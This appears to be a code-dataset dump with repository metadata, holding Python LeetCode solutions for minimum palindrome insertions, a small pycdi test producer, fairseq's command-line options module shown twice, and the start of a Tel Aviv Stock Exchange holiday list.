            prev = cur[:]
            cur[i] = 1
            for j in range(i + 1, n):
                if s[i] == s[j]:
                    cur[j] = prev[j - 1] + 2
                else:
                    cur[j] = max(cur[j - 1], prev[j])
        return n - cur[n - 1]
__________________________________________________________________________________________________
sample 388 ms submission
from collections import Counter, defaultdict, OrderedDict, deque
from bisect import bisect_left, bisect_right
from functools import reduce
import string
true = True
false = False
class Solution:
    """Min insertions to palindromize s, via the longest palindromic subsequence."""

    def longestPalindromeSubseq(self, s):
        """Length of the longest palindromic subsequence of s (O(n^2)/O(n) DP)."""
        length = len(s)
        # A palindrome is its own longest palindromic subsequence.
        if s == s[::-1]:
            return length
        row = [0] * length
        for left in reversed(range(length)):
            above = row[:]  # DP row for intervals starting at left + 1
            row[left] = 1
            for right in range(left + 1, length):
                if s[left] == s[right]:
                    row[right] = above[right - 1] + 2
                else:
                    row[right] = max(above[right], row[right - 1])
        return row[-1]

    def minInsertions(self, s: str) -> int:
        """Each character not on the LPS costs exactly one insertion."""
        if s == s[::-1]:
            return 0
        return len(s) - self.longestPalindromeSubseq(s)
__________________________________________________________________________________________________
| 44.682927 | 636 | 0.596616 | __________________________________________________________________________________________________
sample 24 ms submission
class Solution:
    """LeetCode 1312: minimum insertions needed to make a string a palindrome."""

    def minInsertions(self, s: str) -> int:
        """Return the minimum number of characters to insert so s becomes a palindrome.

        Answer = len(s) - length of the longest palindromic subsequence (LPS):
        LPS characters stay, each remaining character needs one mirrored
        insertion.  Replaces the hard-coded answer tables, the dead `jump`
        helper, and the incorrect `return 1` fallback with the proper
        O(n^2) time / O(n) space interval DP.
        """
        n = len(s)
        if n <= 1 or s == s[::-1]:
            return 0
        # cur[j]: LPS length of s[i..j] for the current row i; prev is row i+1.
        cur = [0] * n
        for i in range(n - 1, -1, -1):
            prev = cur[:]
            cur[i] = 1
            for j in range(i + 1, n):
                if s[i] == s[j]:
                    cur[j] = prev[j - 1] + 2
                else:
                    cur[j] = max(cur[j - 1], prev[j])
        return n - cur[n - 1]
__________________________________________________________________________________________________
sample 388 ms submission
from collections import Counter, defaultdict, OrderedDict, deque
from bisect import bisect_left, bisect_right
from functools import reduce
import string
true = True
false = False
class Solution:
    """Minimum palindromizing insertions computed from the LPS length."""

    def longestPalindromeSubseq(self, s):
        """O(n^2)-time, O(n)-space DP over string intervals."""
        size = len(s)
        if s == s[::-1]:
            return size  # already a palindrome
        dp = [0] * size
        for start in range(size - 1, -1, -1):
            older = dp[:]  # row for intervals beginning at start + 1
            dp[start] = 1
            for end in range(start + 1, size):
                dp[end] = (older[end - 1] + 2 if s[start] == s[end]
                           else max(older[end], dp[end - 1]))
        return dp[-1]

    def minInsertions(self, s: str) -> int:
        """len(s) minus the LPS length; zero for a palindrome."""
        if s == s[::-1]:
            return 0
        return len(s) - self.longestPalindromeSubseq(s)
__________________________________________________________________________________________________
| false | true |
f7fa3c98af72fc4111da2a402f5f8fb52908029a | 100 | py | Python | tests/common/boot/load_me_cdi.py | cesartalves/python-cdi | a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2 | [
"BSD-3-Clause"
] | 10 | 2017-02-02T19:23:12.000Z | 2020-11-18T05:37:10.000Z | tests/common/boot/load_me_cdi.py | cesartalves/python-cdi | a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2 | [
"BSD-3-Clause"
] | 34 | 2017-07-29T21:03:20.000Z | 2021-07-01T13:35:31.000Z | tests/common/boot/load_me_cdi.py | cesartalves/python-cdi | a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2 | [
"BSD-3-Clause"
] | 1 | 2019-06-05T14:45:36.000Z | 2019-06-05T14:45:36.000Z | from pycdi import Producer
@Producer(str, _context='load_me')
def producer():
    """Produce this module's dotted name as a CDI str, scoped to the 'load_me' context."""
    return __name__
| 14.285714 | 34 | 0.74 | from pycdi import Producer
@Producer(str, _context='load_me')
def producer():
    """Produce this module's dotted name as a CDI str, scoped to the 'load_me' context."""
    return __name__
| true | true |
f7fa3ca9106f79e3d5f56b1840dbb89bcbc5ccdb | 13,839 | py | Python | fairseq/options.py | jaehwlee/K-wav2vec | 6ba33f0ef7d2399e4c52a3c80d83a092dac4daa9 | [
"Apache-2.0"
] | 33 | 2021-08-11T12:52:53.000Z | 2022-03-08T03:03:21.000Z | fairseq/options.py | jaehwlee/K-wav2vec | 6ba33f0ef7d2399e4c52a3c80d83a092dac4daa9 | [
"Apache-2.0"
] | 3 | 2022-01-09T07:34:38.000Z | 2022-02-14T12:42:03.000Z | fairseq/options.py | jaehwlee/K-wav2vec | 6ba33f0ef7d2399e4c52a3c80d83a092dac4daa9 | [
"Apache-2.0"
] | 4 | 2021-12-06T08:53:19.000Z | 2022-01-25T06:37:50.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
from typing import Callable, List, Optional
import torch
from fairseq import utils
from fairseq.data.indexed_dataset import get_available_dataset_impl
from fairseq.dataclass.configs import (
CheckpointConfig,
CommonConfig,
CommonEvalConfig,
DatasetConfig,
DistributedTrainingConfig,
EvalLMConfig,
GenerationConfig,
InteractiveConfig,
OptimizationConfig,
)
from fairseq.dataclass.utils import gen_parser_from_dataclass
# this import is for backward compatibility
from fairseq.utils import csv_str_list, eval_bool, eval_str_dict, eval_str_list # noqa
def get_preprocessing_parser(default_task="translation"):
    """Build the argument parser used by fairseq-preprocess."""
    p = get_parser("Preprocessing", default_task)
    add_preprocess_args(p)
    return p


def get_training_parser(default_task="translation"):
    """Build the argument parser used by fairseq-train."""
    p = get_parser("Trainer", default_task)
    add_dataset_args(p, train=True)
    add_distributed_training_args(p)
    add_model_args(p)
    add_optimization_args(p)
    add_checkpoint_args(p)
    return p


def get_generation_parser(interactive=False, default_task="translation"):
    """Build the argument parser used by fairseq-generate (and, with
    interactive=True, fairseq-interactive)."""
    p = get_parser("Generation", default_task)
    add_dataset_args(p, gen=True)
    add_distributed_training_args(p, default_world_size=1)
    add_generation_args(p)
    add_checkpoint_args(p)
    if interactive:
        add_interactive_args(p)
    return p


def get_interactive_generation_parser(default_task="translation"):
    """Convenience wrapper: a generation parser with interactive options enabled."""
    return get_generation_parser(interactive=True, default_task=default_task)


def get_eval_lm_parser(default_task="language_modeling"):
    """Build the argument parser used by fairseq-eval-lm."""
    p = get_parser("Evaluate Language Model", default_task)
    add_dataset_args(p, gen=True)
    add_distributed_training_args(p, default_world_size=1)
    add_eval_lm_args(p)
    return p


def get_validation_parser(default_task=None):
    """Build the argument parser used by fairseq-validate."""
    p = get_parser("Validation", default_task)
    add_dataset_args(p, train=True)
    add_distributed_training_args(p, default_world_size=1)
    grp = p.add_argument_group("Evaluation")
    gen_parser_from_dataclass(grp, CommonEvalConfig())
    return p
def parse_args_and_arch(
    parser: argparse.ArgumentParser,
    input_args: List[str] = None,
    parse_known: bool = False,
    suppress_defaults: bool = False,
    modify_parser: Optional[Callable[[argparse.ArgumentParser], None]] = None,
):
    """
    Parse command-line args with a two-pass scheme: a first pass discovers the
    chosen task/model/registry components, their extra arguments are added to
    the parser, and a second pass parses everything.

    Args:
        parser (ArgumentParser): the parser
        input_args (List[str]): strings to parse, defaults to sys.argv
        parse_known (bool): only parse known arguments, similar to
            `ArgumentParser.parse_known_args`
        suppress_defaults (bool): parse while ignoring all default values
        modify_parser (Optional[Callable[[ArgumentParser], None]]):
            function to modify the parser, e.g., to set default values

    Returns:
        argparse.Namespace, or (Namespace, extra_args) when parse_known=True.
    """
    if suppress_defaults:
        # Parse args without any default values. This requires us to parse
        # twice, once to identify all the necessary task/model args, and a second
        # time with all defaults set to None.
        args = parse_args_and_arch(
            parser,
            input_args=input_args,
            parse_known=parse_known,
            suppress_defaults=False,
        )
        suppressed_parser = argparse.ArgumentParser(add_help=False, parents=[parser])
        suppressed_parser.set_defaults(**{k: None for k, v in vars(args).items()})
        args = suppressed_parser.parse_args(input_args)
        # Only keep the options the user actually supplied.
        return argparse.Namespace(
            **{k: v for k, v in vars(args).items() if v is not None}
        )
    from fairseq.models import ARCH_MODEL_REGISTRY, ARCH_CONFIG_REGISTRY, MODEL_REGISTRY
    # Before creating the true parser, we need to import optional user module
    # in order to eagerly import custom tasks, optimizers, architectures, etc.
    usr_parser = argparse.ArgumentParser(add_help=False, allow_abbrev=False)
    usr_parser.add_argument("--user-dir", default=None)
    usr_args, _ = usr_parser.parse_known_args(input_args)
    utils.import_user_module(usr_args)
    if modify_parser is not None:
        modify_parser(parser)
    # The parser doesn't know about model/criterion/optimizer-specific args, so
    # we parse twice. First we parse the model/criterion/optimizer, then we
    # parse a second time after adding the *-specific arguments.
    # If input_args is given, we will parse those args instead of sys.argv.
    args, _ = parser.parse_known_args(input_args)
    # Add model-specific args to parser.
    if hasattr(args, "arch"):
        model_specific_group = parser.add_argument_group(
            "Model-specific configuration",
            # Only include attributes which are explicitly given as command-line
            # arguments or which have default values.
            argument_default=argparse.SUPPRESS,
        )
        if args.arch in ARCH_MODEL_REGISTRY:
            ARCH_MODEL_REGISTRY[args.arch].add_args(model_specific_group)
        elif args.arch in MODEL_REGISTRY:
            MODEL_REGISTRY[args.arch].add_args(model_specific_group)
        else:
            raise RuntimeError()
    if hasattr(args, "task"):
        from fairseq.tasks import TASK_REGISTRY
        TASK_REGISTRY[args.task].add_args(parser)
    if getattr(args, "use_bmuf", False):
        # hack to support extra args for block distributed data parallelism
        from fairseq.optim.bmuf import FairseqBMUF
        FairseqBMUF.add_args(parser)
    # Add *-specific args to parser.
    from fairseq.registry import REGISTRIES
    for registry_name, REGISTRY in REGISTRIES.items():
        choice = getattr(args, registry_name, None)
        if choice is not None:
            cls = REGISTRY["registry"][choice]
            if hasattr(cls, "add_args"):
                cls.add_args(parser)
            elif hasattr(cls, "__dataclass"):
                gen_parser_from_dataclass(parser, cls.__dataclass())
    # Modify the parser a second time, since defaults may have been reset
    if modify_parser is not None:
        modify_parser(parser)
    # Parse a second time.
    if parse_known:
        args, extra = parser.parse_known_args(input_args)
    else:
        args = parser.parse_args(input_args)
        extra = None
    # Post-process args.
    # Fall back to the training batch size / token budget for validation.
    if (
        hasattr(args, "batch_size_valid") and args.batch_size_valid is None
    ) or not hasattr(args, "batch_size_valid"):
        args.batch_size_valid = args.batch_size
    if hasattr(args, "max_tokens_valid") and args.max_tokens_valid is None:
        args.max_tokens_valid = args.max_tokens
    if getattr(args, "memory_efficient_fp16", False):
        args.fp16 = True
    if getattr(args, "memory_efficient_bf16", False):
        args.bf16 = True
    args.tpu = getattr(args, "tpu", False)
    args.bf16 = getattr(args, "bf16", False)
    # --bf16 forces TPU mode, and fp16 is rejected together with TPUs.
    if args.bf16:
        args.tpu = True
    if args.tpu and args.fp16:
        raise ValueError("Cannot combine --fp16 and --tpu, use --bf16 on TPUs")
    if getattr(args, "seed", None) is None:
        args.seed = 1  # default seed for training
        args.no_seed_provided = True
    else:
        args.no_seed_provided = False
    # Apply architecture configuration.
    if hasattr(args, "arch") and args.arch in ARCH_CONFIG_REGISTRY:
        ARCH_CONFIG_REGISTRY[args.arch](args)
    if parse_known:
        return args, extra
    else:
        return args
def get_parser(desc, default_task="translation"):
    """Create the base fairseq parser: common options, one flag per component
    registry, and the --task argument.  Component-specific args are added
    later by parse_args_and_arch."""
    # Eagerly import any --user-dir module first so that custom tasks,
    # optimizers, architectures, etc. are registered before parsing.
    pre_parser = argparse.ArgumentParser(add_help=False, allow_abbrev=False)
    pre_parser.add_argument("--user-dir", default=None)
    pre_args, _ = pre_parser.parse_known_args()
    utils.import_user_module(pre_args)

    parser = argparse.ArgumentParser(allow_abbrev=False)
    gen_parser_from_dataclass(parser, CommonConfig())

    from fairseq.registry import REGISTRIES

    for reg_name, registry in REGISTRIES.items():
        parser.add_argument(
            "--" + reg_name.replace("_", "-"),
            default=registry["default"],
            choices=registry["registry"].keys(),
        )

    # Task definitions can be found under fairseq/tasks/
    from fairseq.tasks import TASK_REGISTRY

    parser.add_argument(
        "--task",
        metavar="TASK",
        default=default_task,
        choices=TASK_REGISTRY.keys(),
        help="task",
    )
    return parser
def add_preprocess_args(parser):
    """Attach fairseq-preprocess options (languages, file prefixes,
    dictionary building/reuse, output format, workers) and return the parser."""
    group = parser.add_argument_group("Preprocessing")
    # fmt: off
    group.add_argument("-s", "--source-lang", default=None, metavar="SRC",
                       help="source language")
    group.add_argument("-t", "--target-lang", default=None, metavar="TARGET",
                       help="target language")
    group.add_argument("--trainpref", metavar="FP", default=None,
                       help="train file prefix (also used to build dictionaries)")
    group.add_argument("--validpref", metavar="FP", default=None,
                       help="comma separated, valid file prefixes "
                            "(words missing from train set are replaced with <unk>)")
    group.add_argument("--testpref", metavar="FP", default=None,
                       help="comma separated, test file prefixes "
                            "(words missing from train set are replaced with <unk>)")
    group.add_argument("--align-suffix", metavar="FP", default=None,
                       help="alignment file suffix")
    group.add_argument("--destdir", metavar="DIR", default="data-bin",
                       help="destination dir")
    group.add_argument("--thresholdtgt", metavar="N", default=0, type=int,
                       help="map words appearing less than threshold times to unknown")
    group.add_argument("--thresholdsrc", metavar="N", default=0, type=int,
                       help="map words appearing less than threshold times to unknown")
    group.add_argument("--tgtdict", metavar="FP",
                       help="reuse given target dictionary")
    group.add_argument("--srcdict", metavar="FP",
                       help="reuse given source dictionary")
    group.add_argument("--nwordstgt", metavar="N", default=-1, type=int,
                       help="number of target words to retain")
    group.add_argument("--nwordssrc", metavar="N", default=-1, type=int,
                       help="number of source words to retain")
    group.add_argument("--alignfile", metavar="ALIGN", default=None,
                       help="an alignment file (optional)")
    # NOTE(review): registered on the top-level parser, not the group —
    # presumably intentional so it is shared with other groups; verify.
    parser.add_argument('--dataset-impl', metavar='FORMAT', default='mmap',
                        choices=get_available_dataset_impl(),
                        help='output dataset implementation')
    group.add_argument("--joined-dictionary", action="store_true",
                       help="Generate joined dictionary")
    group.add_argument("--only-source", action="store_true",
                       help="Only process the source language")
    group.add_argument("--padding-factor", metavar="N", default=8, type=int,
                       help="Pad dictionary size to be multiple of N")
    group.add_argument("--workers", metavar="N", default=1, type=int,
                       help="number of parallel workers")
    # fmt: on
    return parser
def add_dataset_args(parser, train=False, gen=False):
    """Register dataset / data-loading options on *parser* and return the group.

    The *train* and *gen* flags are accepted for interface compatibility but
    are not consulted here; all options come from ``DatasetConfig``.
    """
    dataset_group = parser.add_argument_group("dataset_data_loading")
    gen_parser_from_dataclass(dataset_group, DatasetConfig())
    return dataset_group
def add_distributed_training_args(parser, default_world_size=None):
    """Register distributed-training options on *parser* and return the group.

    When *default_world_size* is None, it falls back to the number of visible
    CUDA devices (at least 1).
    """
    dist_group = parser.add_argument_group("distributed_training")
    world_size = default_world_size
    if world_size is None:
        world_size = max(1, torch.cuda.device_count())
    gen_parser_from_dataclass(
        dist_group, DistributedTrainingConfig(distributed_world_size=world_size)
    )
    return dist_group
def add_optimization_args(parser):
    """Register optimization options (from ``OptimizationConfig``) on *parser*."""
    opt_group = parser.add_argument_group("optimization")
    gen_parser_from_dataclass(opt_group, OptimizationConfig())
    return opt_group
def add_checkpoint_args(parser):
    """Register checkpointing options (from ``CheckpointConfig``) on *parser*."""
    ckpt_group = parser.add_argument_group("checkpoint")
    gen_parser_from_dataclass(ckpt_group, CheckpointConfig())
    return ckpt_group
def add_common_eval_args(group):
    """Add evaluation options shared by the LM-evaluation and generation parsers."""
    gen_parser_from_dataclass(group, CommonEvalConfig())
def add_eval_lm_args(parser):
    """Register language-model evaluation options on *parser*."""
    eval_group = parser.add_argument_group("LM Evaluation")
    add_common_eval_args(eval_group)
    gen_parser_from_dataclass(eval_group, EvalLMConfig())
def add_generation_args(parser):
    """Register generation options on *parser* and return the argument group."""
    generation_group = parser.add_argument_group("Generation")
    add_common_eval_args(generation_group)
    gen_parser_from_dataclass(generation_group, GenerationConfig())
    return generation_group
def add_interactive_args(parser):
    """Register interactive-generation options on *parser*."""
    interactive_group = parser.add_argument_group("Interactive")
    gen_parser_from_dataclass(interactive_group, InteractiveConfig())
def add_model_args(parser):
    """Register model-architecture options on *parser* and return the group.

    The architecture is resolved in increasing order of priority:
    model defaults, then the ``--arch`` argument, then any
    ``--encoder/decoder-*`` arguments.  Model definitions live under
    ``fairseq/models/``.
    """
    model_group = parser.add_argument_group("Model configuration")
    from fairseq.models import ARCH_MODEL_REGISTRY
    model_group.add_argument(
        "--arch", "-a", metavar="ARCH",
        choices=ARCH_MODEL_REGISTRY.keys(),
        help="model architecture",
    )
    return model_group
| 37.811475 | 88 | 0.681769 |
import argparse
from typing import Callable, List, Optional
import torch
from fairseq import utils
from fairseq.data.indexed_dataset import get_available_dataset_impl
from fairseq.dataclass.configs import (
CheckpointConfig,
CommonConfig,
CommonEvalConfig,
DatasetConfig,
DistributedTrainingConfig,
EvalLMConfig,
GenerationConfig,
InteractiveConfig,
OptimizationConfig,
)
from fairseq.dataclass.utils import gen_parser_from_dataclass
from fairseq.utils import csv_str_list, eval_bool, eval_str_dict, eval_str_list
def get_preprocessing_parser(default_task="translation"):
    """Return an argument parser carrying all preprocessing options."""
    preprocess_parser = get_parser("Preprocessing", default_task)
    add_preprocess_args(preprocess_parser)
    return preprocess_parser
def get_training_parser(default_task="translation"):
    """Return an argument parser carrying all options needed for training."""
    train_parser = get_parser("Trainer", default_task)
    add_dataset_args(train_parser, train=True)
    add_distributed_training_args(train_parser)
    add_model_args(train_parser)
    add_optimization_args(train_parser)
    add_checkpoint_args(train_parser)
    return train_parser
def get_generation_parser(interactive=False, default_task="translation"):
    """Return a generation parser; include interactive options when requested."""
    generation_parser = get_parser("Generation", default_task)
    add_dataset_args(generation_parser, gen=True)
    add_distributed_training_args(generation_parser, default_world_size=1)
    add_generation_args(generation_parser)
    add_checkpoint_args(generation_parser)
    if interactive:
        add_interactive_args(generation_parser)
    return generation_parser
def get_interactive_generation_parser(default_task="translation"):
    """Return a generation parser with the interactive options enabled."""
    return get_generation_parser(interactive=True, default_task=default_task)
def get_eval_lm_parser(default_task="language_modeling"):
    """Return an argument parser for language-model evaluation."""
    lm_parser = get_parser("Evaluate Language Model", default_task)
    add_dataset_args(lm_parser, gen=True)
    add_distributed_training_args(lm_parser, default_world_size=1)
    add_eval_lm_args(lm_parser)
    return lm_parser
def get_validation_parser(default_task=None):
    """Return an argument parser for validation runs."""
    validation_parser = get_parser("Validation", default_task)
    add_dataset_args(validation_parser, train=True)
    add_distributed_training_args(validation_parser, default_world_size=1)
    eval_group = validation_parser.add_argument_group("Evaluation")
    gen_parser_from_dataclass(eval_group, CommonEvalConfig())
    return validation_parser
def parse_args_and_arch(
    parser: argparse.ArgumentParser,
    input_args: List[str] = None,
    parse_known: bool = False,
    suppress_defaults: bool = False,
    modify_parser: Optional[Callable[[argparse.ArgumentParser], None]] = None,
):
    """Parse command-line arguments and apply the architecture configuration.

    Args:
        parser: base parser (typically built by ``get_parser``).
        input_args: args to parse instead of ``sys.argv`` when given.
        parse_known: if True, return ``(args, extra)`` where *extra* holds
            unrecognized arguments instead of erroring on them.
        suppress_defaults: if True, return a namespace containing only the
            options that were explicitly provided (all defaults dropped).
        modify_parser: optional callback that mutates the parser; it is
            invoked both before and after task/model-specific options are
            added, since those additions may reset defaults.
    """
    if suppress_defaults:
        # Parse once normally, then re-parse with every default set to None
        # and keep only the options that were explicitly provided.
        args = parse_args_and_arch(
            parser,
            input_args=input_args,
            parse_known=parse_known,
            suppress_defaults=False,
        )
        suppressed_parser = argparse.ArgumentParser(add_help=False, parents=[parser])
        suppressed_parser.set_defaults(**{k: None for k, v in vars(args).items()})
        args = suppressed_parser.parse_args(input_args)
        return argparse.Namespace(
            **{k: v for k, v in vars(args).items() if v is not None}
        )
    from fairseq.models import ARCH_MODEL_REGISTRY, ARCH_CONFIG_REGISTRY, MODEL_REGISTRY
    # Pre-parse --user-dir alone so user-supplied modules (custom tasks,
    # models, ...) are importable before the registries are consulted.
    usr_parser = argparse.ArgumentParser(add_help=False, allow_abbrev=False)
    usr_parser.add_argument("--user-dir", default=None)
    usr_args, _ = usr_parser.parse_known_args(input_args)
    utils.import_user_module(usr_args)
    if modify_parser is not None:
        modify_parser(parser)
    # we parse twice. First we parse the model/criterion/optimizer, then we
    # parse a second time after adding the *-specific arguments.
    # If input_args is given, we will parse those args instead of sys.argv.
    args, _ = parser.parse_known_args(input_args)
    # Add model-specific args to parser.
    if hasattr(args, "arch"):
        model_specific_group = parser.add_argument_group(
            "Model-specific configuration",
            # Only include attributes which are explicitly given as command-line
            # arguments or which have default values.
            argument_default=argparse.SUPPRESS,
        )
        if args.arch in ARCH_MODEL_REGISTRY:
            ARCH_MODEL_REGISTRY[args.arch].add_args(model_specific_group)
        elif args.arch in MODEL_REGISTRY:
            MODEL_REGISTRY[args.arch].add_args(model_specific_group)
        else:
            raise RuntimeError()
    if hasattr(args, "task"):
        from fairseq.tasks import TASK_REGISTRY
        TASK_REGISTRY[args.task].add_args(parser)
    if getattr(args, "use_bmuf", False):
        # hack to support extra args for block distributed data parallelism
        from fairseq.optim.bmuf import FairseqBMUF
        FairseqBMUF.add_args(parser)
    # Add *-specific args to parser.
    from fairseq.registry import REGISTRIES
    for registry_name, REGISTRY in REGISTRIES.items():
        choice = getattr(args, registry_name, None)
        if choice is not None:
            cls = REGISTRY["registry"][choice]
            if hasattr(cls, "add_args"):
                cls.add_args(parser)
            elif hasattr(cls, "__dataclass"):
                gen_parser_from_dataclass(parser, cls.__dataclass())
    # Modify the parser a second time, since defaults may have been reset
    if modify_parser is not None:
        modify_parser(parser)
    # Parse a second time.
    if parse_known:
        args, extra = parser.parse_known_args(input_args)
    else:
        args = parser.parse_args(input_args)
        extra = None
    # Post-process args.
    # Validation batch settings fall back to their training counterparts.
    if (
        hasattr(args, "batch_size_valid") and args.batch_size_valid is None
    ) or not hasattr(args, "batch_size_valid"):
        args.batch_size_valid = args.batch_size
    if hasattr(args, "max_tokens_valid") and args.max_tokens_valid is None:
        args.max_tokens_valid = args.max_tokens
    if getattr(args, "memory_efficient_fp16", False):
        args.fp16 = True
    if getattr(args, "memory_efficient_bf16", False):
        args.bf16 = True
    args.tpu = getattr(args, "tpu", False)
    args.bf16 = getattr(args, "bf16", False)
    if args.bf16:
        args.tpu = True
    if args.tpu and args.fp16:
        raise ValueError("Cannot combine --fp16 and --tpu, use --bf16 on TPUs")
    if getattr(args, "seed", None) is None:
        args.seed = 1  # default seed for training
        args.no_seed_provided = True
    else:
        args.no_seed_provided = False
    # Apply architecture configuration.
    if hasattr(args, "arch") and args.arch in ARCH_CONFIG_REGISTRY:
        ARCH_CONFIG_REGISTRY[args.arch](args)
    if parse_known:
        return args, extra
    else:
        return args
def get_parser(desc, default_task="translation"):
    """Build the base parser with common, registry, and ``--task`` options.

    NOTE(review): *desc* is not referenced in this body — presumably kept for
    API compatibility; confirm against callers.
    """
    # Before creating the true parser, we need to import optional user module
    # in order to eagerly import custom tasks, optimizers, architectures, etc.
    usr_parser = argparse.ArgumentParser(add_help=False, allow_abbrev=False)
    usr_parser.add_argument("--user-dir", default=None)
    usr_args, _ = usr_parser.parse_known_args()
    utils.import_user_module(usr_args)
    parser = argparse.ArgumentParser(allow_abbrev=False)
    gen_parser_from_dataclass(parser, CommonConfig())
    # One option per registry (e.g. --optimizer, --criterion, ...).
    from fairseq.registry import REGISTRIES
    for registry_name, REGISTRY in REGISTRIES.items():
        parser.add_argument(
            "--" + registry_name.replace("_", "-"),
            default=REGISTRY["default"],
            choices=REGISTRY["registry"].keys(),
        )
    # Task definitions can be found under fairseq/tasks/
    from fairseq.tasks import TASK_REGISTRY
    parser.add_argument(
        "--task",
        metavar="TASK",
        default=default_task,
        choices=TASK_REGISTRY.keys(),
        help="task",
    )
    # fmt: on
    return parser
def add_preprocess_args(parser):
    """Register data-preprocessing options on *parser* and return it."""
    group = parser.add_argument_group("Preprocessing")
    # fmt: off
    group.add_argument("-s", "--source-lang", default=None, metavar="SRC",
                       help="source language")
    group.add_argument("-t", "--target-lang", default=None, metavar="TARGET",
                       help="target language")
    group.add_argument("--trainpref", metavar="FP", default=None,
                       help="train file prefix (also used to build dictionaries)")
    group.add_argument("--validpref", metavar="FP", default=None,
                       help="comma separated, valid file prefixes "
                            "(words missing from train set are replaced with <unk>)")
    group.add_argument("--testpref", metavar="FP", default=None,
                       help="comma separated, test file prefixes "
                            "(words missing from train set are replaced with <unk>)")
    group.add_argument("--align-suffix", metavar="FP", default=None,
                       help="alignment file suffix")
    group.add_argument("--destdir", metavar="DIR", default="data-bin",
                       help="destination dir")
    group.add_argument("--thresholdtgt", metavar="N", default=0, type=int,
                       help="map words appearing less than threshold times to unknown")
    group.add_argument("--thresholdsrc", metavar="N", default=0, type=int,
                       help="map words appearing less than threshold times to unknown")
    group.add_argument("--tgtdict", metavar="FP",
                       help="reuse given target dictionary")
    group.add_argument("--srcdict", metavar="FP",
                       help="reuse given source dictionary")
    group.add_argument("--nwordstgt", metavar="N", default=-1, type=int,
                       help="number of target words to retain")
    group.add_argument("--nwordssrc", metavar="N", default=-1, type=int,
                       help="number of source words to retain")
    group.add_argument("--alignfile", metavar="ALIGN", default=None,
                       help="an alignment file (optional)")
    # Consistency fix: this option was registered on `parser` while every
    # sibling is registered on the Preprocessing group.  Groups share the
    # underlying parser, so parsing behavior is unchanged; only the help
    # output now lists --dataset-impl with its siblings.
    group.add_argument("--dataset-impl", metavar="FORMAT", default="mmap",
                       choices=get_available_dataset_impl(),
                       help="output dataset implementation")
    group.add_argument("--joined-dictionary", action="store_true",
                       help="Generate joined dictionary")
    group.add_argument("--only-source", action="store_true",
                       help="Only process the source language")
    group.add_argument("--padding-factor", metavar="N", default=8, type=int,
                       help="Pad dictionary size to be multiple of N")
    group.add_argument("--workers", metavar="N", default=1, type=int,
                       help="number of parallel workers")
    # fmt: on
    return parser
def add_dataset_args(parser, train=False, gen=False):
    """Add dataset/data-loading options; *train*/*gen* are unused here."""
    group = parser.add_argument_group("dataset_data_loading")
    gen_parser_from_dataclass(group, DatasetConfig())
    # fmt: on
    return group
def add_distributed_training_args(parser, default_world_size=None):
    """Add distributed-training options; world size defaults to CUDA device count."""
    group = parser.add_argument_group("distributed_training")
    if default_world_size is None:
        default_world_size = max(1, torch.cuda.device_count())
    gen_parser_from_dataclass(
        group, DistributedTrainingConfig(distributed_world_size=default_world_size)
    )
    return group
def add_optimization_args(parser):
    """Add optimization options from ``OptimizationConfig``."""
    group = parser.add_argument_group("optimization")
    # fmt: off
    gen_parser_from_dataclass(group, OptimizationConfig())
    # fmt: on
    return group
def add_checkpoint_args(parser):
    """Add checkpointing options from ``CheckpointConfig``."""
    group = parser.add_argument_group("checkpoint")
    # fmt: off
    gen_parser_from_dataclass(group, CheckpointConfig())
    # fmt: on
    return group
def add_common_eval_args(group):
    """Add evaluation options shared by the LM-evaluation and generation parsers."""
    gen_parser_from_dataclass(group, CommonEvalConfig())
def add_eval_lm_args(parser):
    """Add language-model evaluation options."""
    group = parser.add_argument_group("LM Evaluation")
    add_common_eval_args(group)
    gen_parser_from_dataclass(group, EvalLMConfig())
def add_generation_args(parser):
    """Add generation options and return the argument group."""
    group = parser.add_argument_group("Generation")
    add_common_eval_args(group)
    gen_parser_from_dataclass(group, GenerationConfig())
    return group
def add_interactive_args(parser):
    """Add interactive-generation options."""
    group = parser.add_argument_group("Interactive")
    gen_parser_from_dataclass(group, InteractiveConfig())
def add_model_args(parser):
    """Add model-architecture options and return the argument group."""
    group = parser.add_argument_group("Model configuration")
    # fmt: off
    # Model definitions can be found under fairseq/models/
    #
    # The model architecture can be specified in several ways.
    # In increasing order of priority:
    # 1) model defaults (lowest priority)
    # 2) --arch argument
    # 3) --encoder/decoder-* arguments (highest priority)
    from fairseq.models import ARCH_MODEL_REGISTRY
    group.add_argument('--arch', '-a', metavar='ARCH',
                       choices=ARCH_MODEL_REGISTRY.keys(),
                       help='model architecture')
    # fmt: on
    return group
| true | true |
f7fa3cd0482257d2b9b331b917227a040202021b | 4,348 | py | Python | pandas_market_calendars/exchange_calendar_tase.py | gabglus/pandas_market_calendars | dc1453a240a34f569cfd2b4e8ffd396f82c34b14 | [
"MIT"
] | null | null | null | pandas_market_calendars/exchange_calendar_tase.py | gabglus/pandas_market_calendars | dc1453a240a34f569cfd2b4e8ffd396f82c34b14 | [
"MIT"
] | null | null | null | pandas_market_calendars/exchange_calendar_tase.py | gabglus/pandas_market_calendars | dc1453a240a34f569cfd2b4e8ffd396f82c34b14 | [
"MIT"
] | null | null | null | from datetime import time
from pandas import Timestamp
from pytz import timezone
from pandas_market_calendars import MarketCalendar
# Ad-hoc TASE closures (holiday dates), as tz-aware midnight timestamps.
# Grouped by year below; consumed by TASEExchangeCalendar.adhoc_holidays.
TASEClosedDay = [
    # 2019
    Timestamp('2019-03-21', tz='Asia/Jerusalem'),
    Timestamp('2019-04-09', tz='Asia/Jerusalem'),
    Timestamp('2019-04-25', tz='Asia/Jerusalem'),
    Timestamp('2019-04-26', tz='Asia/Jerusalem'),
    Timestamp('2019-05-08', tz='Asia/Jerusalem'),
    Timestamp('2019-05-09', tz='Asia/Jerusalem'),
    Timestamp('2019-06-09', tz='Asia/Jerusalem'),
    Timestamp('2019-08-11', tz='Asia/Jerusalem'),
    Timestamp('2019-09-17', tz='Asia/Jerusalem'),
    Timestamp('2019-09-29', tz='Asia/Jerusalem'),
    Timestamp('2019-09-30', tz='Asia/Jerusalem'),
    Timestamp('2019-10-01', tz='Asia/Jerusalem'),
    Timestamp('2019-10-08', tz='Asia/Jerusalem'),
    Timestamp('2019-10-09', tz='Asia/Jerusalem'),
    Timestamp('2019-10-13', tz='Asia/Jerusalem'),
    Timestamp('2019-10-14', tz='Asia/Jerusalem'),
    Timestamp('2019-10-20', tz='Asia/Jerusalem'),
